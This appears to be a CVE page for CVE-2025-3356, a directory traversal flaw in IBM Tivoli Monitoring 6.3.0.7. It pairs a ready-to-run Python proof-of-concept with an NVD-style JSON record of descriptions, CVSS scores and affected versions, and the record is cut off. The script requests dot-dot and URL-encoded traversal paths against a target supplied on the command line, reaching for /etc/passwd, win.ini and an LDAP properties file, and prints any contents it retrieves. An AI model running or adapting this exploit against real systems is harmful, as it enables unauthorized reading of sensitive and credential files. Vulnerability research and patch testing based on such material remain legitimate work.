CVE-2025-3356

# CVE-2025-3356 Path Traversal PoC # Target: IBM Tivoli Monitoring 6.3.0.7 - 6.3.0.7 SP21 # Vulnerability: Directory Traversal via dot-dot sequences import requests import sys def test_path_traversal(target_url): """Test for CVE-2025-3356 path traversal vulnerability""" # Common sensitive files to target sensitive_files = [ '/etc/passwd', '../../../etc/passwd', '../../../../etc/passwd', '../../../../../etc/passwd', '../../../windows/win.ini', '../../../../windows/win.ini', '../../../ibm/tivoli/itim/conf/ldap.properties', '../../../../ibm/tivoli/itim/conf/ldap.properties' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': '*/*' } print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-3356 Path Traversal Test") print("=" * 60) for file_path in sensitive_files: # Try different path traversal patterns test_urls = [ f"{target_url}/ibm/console/logon.jsp{file_path}", f"{target_url}/tivoli/{file_path}", f"{target_url}/jsp/{file_path}", f"{target_url}/..{file_path}", f"{target_url}/..%2F..%2F..%2F..{file_path}", f"{target_url}/.%2e/.%2e/.%2e/.%2e{file_path}" ] for url in test_urls: try: response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200: content_type = response.headers.get('Content-Type', '') if 'text' in content_type or 'application' in content_type: if len(response.text) > 0 and len(response.text) < 100000: print(f"[+] POTENTIAL VULNERABILITY FOUND!") print(f"[+] URL: {url}") print(f"[+] File: {file_path}") print(f"[+] Content preview:") print(response.text[:500]) print("-" * 60) return True except requests.exceptions.RequestException as e: print(f"[-] Error testing {url}: {e}") print("[*] No obvious path traversal detected") return False if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2025-3356.py <target_url>") print("Example: python cve-2025-3356.py https://target:9443") sys.exit(1) target = sys.argv[1].rstrip('/') test_path_traversal(target)

{"cve": {"id": "CVE-2025-3356", "sourceIdentifier": "[email protected]", "published": "2025-10-30T20:15:38.830", "lastModified": "2025-11-07T02:10:58.173", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Tivoli Monitoring 6.3.0.7 through 6.3.0.7 Service Pack 21 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing \"dot dot\" sequences (/../) to view, overwrite, or append to arbitrary files on the system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:-:*:*:*:*:*:*", "matchCriteriaId": "15633ADC-6913-4AA1-8524-F139895B1C9D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp1:*:*:*:*:*:*", "matchCriteriaId": "F8F29F79-3813-4B6F-A0FE-3E12711F2827"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp10:*:*:*:*:*:*", "matchCriteriaId": "63F43D7A-2BB8-475A-9F95-5AD83FC2F1E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp11:*:*:*:*:*:*", "matchCriteriaId": "89FE6200-3F7A-43E6-B9DB-24D1B956A509"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp12:*:*:*:*:*:*", "matchCriteriaId": "8632DB2C-4814-43F9-8AA9-682FB000CDC7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp13:*:*:*:*:*:*", "matchCriteriaId": "9D1B4834-85E5-4E41-9886-03BFD8424FF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp14:*:*:*:*:*:*", "matchCriteriaId": "54AE7933-034F-459B-8C02-2850D3153437"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp15:*:*:*:*:*:*", "matchCriteriaId": "643F4560-5049-466D-B4BA-18DDBBD2BEB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp16:*:*:*:*:*:*", "matchCriteriaId": "3698F091-E08C-4B5C-9E85-1729A19A914F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp17:*:*:*:*:*:*", "matchCriteriaId": "DA218FEA-1091-4098-8A4C-3557924A27EE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp18:*:*:*:*:*:*", "matchCriteriaId": "6993220C-C737-4876-8E52-1C0CB9F109A5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp19:*:*:*:*:*:*", "matchCriteriaId": "2AAFF1A2-750F-4C08-B544-0D6BC56D2048"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp2:*:*:*:*:*:*", "matchCriteriaId": "056BA0BC-CA53-4103-AA0A-692226602765"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp20:*:*:*:*:*:*", "matchCriteriaId": "68430D8F-B043-4179-860E-D4DADB7203E1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp21:*:*:*:*:*:*", "matchCriteriaId": "B9984364-3AFB-4E06-97B0-53B7D5657882"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp3:*:*:*:*:*:*", "matchCriteriaId": "FC469C26-0D30-40CF-8A24-AC7940DD9D44"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp4:*:*:*:*:*:*", "matchCriteriaId": "2E6529C0-2017-413A-9FF8-D3D09475E867"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp5:*:*:*:*:*:*", "matchCriteriaId": "BF411C3F-AB57-4F4B-92C7-6F6C142F2F64"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp6:*:*:*:*:*:*", "matchCriteriaId": "C6BC45D1-9BE9-44FC-A99A-FF99F7393274"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp7:*:*:*:*:*:*", "matchCriteriaId": "53D77364-F817-4BE8-BF25-1537180B06DE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp8:*:*:*:*:*:*", "matchCriteriaId": "680F331C-D4C7-4280-9981-9848BAE460C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:tivoli_monitoring:6.3.0.7:sp9:*:*:*:*:*:*", "matchCriteriaId": "3C ... (truncated)